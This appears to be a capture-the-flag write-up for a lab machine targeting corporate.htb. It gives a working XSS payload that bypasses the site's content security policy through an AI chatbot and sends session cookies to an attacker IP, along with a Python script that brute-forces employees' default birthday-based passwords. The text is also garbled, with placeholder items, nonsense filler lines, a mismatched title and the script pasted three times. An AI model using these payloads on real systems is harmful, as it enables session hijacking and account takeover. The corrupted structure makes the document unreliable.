SolarLab
SolarLab - Medium Windows Box - Season 5 Anomalies.
Fuzzing:
- ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://corporate.htb -H 'Host: FUZZ.corporate.htb' -fs 175
- Item 1
- Item 2
- Item 3
My Checklist
- Item 1
- </i> Item 2
- Item 3
Web Exploration:
-
There is an AI chat bot we can seemingly take advantage of.
-
We are able to send
<html> scriptsthrough the chat bot and it seems to be rendering the scripts.XSSVulnerable.
-
We attempt
javascriptbut it is blocking processing JavaScript withCSPContent-Security-Policy.
-
We are able to send
| | |---| |Content-Security-Policy
base-uri 'self';
default-src 'self' http://corporate.htb http://*.corporate.htb;
style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://maps.googleapis.com https://maps.gstatic.com;
font-src 'self' https://fonts.googleapis.com/ https://fonts.gstatic.com data:;
img-src 'self' data: maps.gstatic.com;
frame-src https://www.google.com/maps/;
object-src 'none';
script-src 'self'|`
Testing the testers of testing
test test test
this is a pre bro ima about to pre pre preeeeeeeeeeeee
Exploring available JavaScript:
-
Here is a curl command that attempts to access that javascript and shows that its possible to access it.
curl -sS 'http://corporate.htb/assets/js/analytics.min.js?v=froggie' -
We can see that it's possible to exploit this javascript. We can craft a URL to send the chatbot now to grab some session cookies.
Sending this script to the chat bot while having a listening server on our attack box will grab a cookie.<meta http-equiv="refresh" content="0; url=http://corporate.htb/%3Cscript+src='/vendor/analytics.min.js'%3E%3C/script%3E%3Cscript+src='/assets/js/analytics.min.js?v=document.location=`http://10.10.14.34:34000/${document.cookie}`'%27%3C/script%3E"/>
Cookie Theft:
-
Setup your server for cookie theft.
python -m http.server 34000- We grab a cookie for
CorporateSSO - Set the cookie in your browser. Set the path to
/and the domain to.corporate.htb/Value=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NTA3MSwibmFtZSI6Ikp1bGlvIiwic3VybmFtZSI6IkRhbmllbCIsImVtYWlsIjoiSnVsaW8uRGFuaWVsQGNvcnBvcmF0ZS5odGIiLCJyb2xlcyI6WyJzYWxlcyJdLCJyZXF1aXJlQ3VycmVudFBhc3N3b3JkIjp0cnVlLCJpYXQiOjE3MjE3NTk4OTksImV4cCI6MTcyMTg0NjI5OX0.peLklF24DypFH8xEUc2VajwwItqc6R7kHzAAgASQ1fE
- We grab a cookie for
-
After setting the cookie then clicking sign in on
people.corporate.htbwe have access to the panel under the userJulio Daniel.- Access to some panels but nothing really stands out too much at first.
- We have a
sharing folderwhere people can share files. - Chat where employees can chat.
- Clicking on profile images sends us to the user's profiles.
- Vulnerable to
IDOR. We can navigate between users in the browser by changing the user number.
- Vulnerable to
- Clicking on profile images sends us to the user's profiles.
- There is an
openvpnfile that I can download. Probably gives access to a VPN to get into the internal network.
IDOR:
- We are able to perform some IDOR with curl and get the files of other users onto our current user's sharing folder. I can't get this to work so I'm moving on.
Brute Forcing Users:
-
There's an email we can look at that gives us an "On-boarding" playbook. It has a generic password format for new employees.
- We can use this basic template and brute force all users we know to see if they forgot to change their passwords.
#!/usr/bin/env python3
import re
import requests
cookie = {"CorporateSSO": "YOUR_COOKIE_HERE"}
for i in range(5000, 5100):
resp = requests.get(f"http://people.corporate.htb/employee/{i}", cookies=cookie)
if "Sorry, we couldn't find that employee!" in resp.text:
continue
# this is a comment
user_name = re.findall(r"(\w+\.\w+)@corporate.htb", resp.text)[0]
birthday_str = re.findall(r'<th scope="row">Birthday</th>\s+<td>(\d{1,2}/\d{1,2}/\d{4})</td>', resp.text)[0]
m, d, y = birthday_str.split('/')
password = f"CorporateStarter{d.zfill(2)}{m.zfill(2)}{y}"
resp_login = requests.post('http://sso.corporate.htb/login', data={'username': user_name, 'password': password}, allow_redirects=False)
if "/login?error=Invalid%20username%20or%20password" not in resp_login.text:
print(f"{user_name}: {password}")
import re
import requests
cookie = {"CorporateSSO": "YOUR_COOKIE_HERE"}
for i in range(5000, 5100):
resp = requests.get(f"http://people.corporate.htb/employee/{i}", cookies=cookie)
if "Sorry, we couldn't find that employee!" in resp.text:
continue
# this is a comment
user_name = re.findall(r"(\w+\.\w+)@corporate.htb", resp.text)[0]
birthday_str = re.findall(r'<th scope="row">Birthday</th>\s+<td>(\d{1,2}/\d{1,2}/\d{4})</td>', resp.text)[0]
m, d, y = birthday_str.split('/')
password = f"CorporateStarter{d.zfill(2)}{m.zfill(2)}{y}"
resp_login = requests.post('http://sso.corporate.htb/login', data={'username': user_name, 'password': password}, allow_redirects=False)
if "/login?error=Invalid%20username%20or%20password" not in resp_login.text:
print(f"{user_name}: {password}")
import re
import requests
cookie = {"CorporateSSO": "YOUR_COOKIE_HERE"}
for i in range(5000, 5100):
resp = requests.get(f"http://people.corporate.htb/employee/{i}", cookies=cookie)
if "Sorry, we couldn't find that employee!" in resp.text:
continue
# this is a comment
user_name = re.findall(r"(\w+\.\w+)@corporate.htb", resp.text)[0]
birthday_str = re.findall(r'<th scope="row">Birthday</th>\s+<td>(\d{1,2}/\d{1,2}/\d{4})</td>', resp.text)[0]
m, d, y = birthday_str.split('/')
password = f"CorporateStarter{d.zfill(2)}{m.zfill(2)}{y}"
resp_login = requests.post('http://sso.corporate.htb/login', data={'username': user_name, 'password': password}, allow_redirects=False)
if "/login?error=Invalid%20username%20or%20password" not in resp_login.text:
print(f"{user_name}: {password}")OpenVPN:
-
Downloaded an
openvpnfile fromelwin.jonesand connected:sudo openvpn elwin-jones.ovpn- We can see the
tun1interface being created on our attacking box.
- We can see the
</body> </html>
